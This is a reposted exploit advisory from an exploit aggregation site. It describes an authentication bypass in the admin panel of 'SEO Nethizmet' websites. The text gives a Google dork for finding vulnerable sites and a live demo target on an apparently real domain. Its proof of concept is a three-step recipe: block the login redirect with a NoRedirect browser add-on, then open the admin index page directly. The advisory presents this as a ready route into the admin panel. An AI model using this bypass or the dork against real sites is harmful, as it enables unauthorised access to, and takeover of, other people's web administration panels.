Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060085

Below is a copy:

SEO Nethizmet Admin NoRedirect Bypass
#Exploit Title: SEO Nethizmet Admin NoRedirect Bypass
#Date: 27-06-2022
#Exploit Author: BQX (./Bertw_QX)
#Google Dork: "intext:"Web Tasarm Seo Nethizmet""
#Vendor Homepage: http://www.webdew.net/
#Category: NoRedirect
#Tested On: Kali Linux - Cyberfox

### Demo : https://dijitalkitap.com/yonetim/yonetici-giris.php

poc: 
1) Open NoRedirect
2) Add "http://localhost/yonetici/yonetici-giris.php" and confirm
3) Open http://localhost/yonetici/index.php with Cyberfox browser

------That's it, you're in the admin panel.------


*********************************************************
#Email: [email protected]
*********************************************************

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.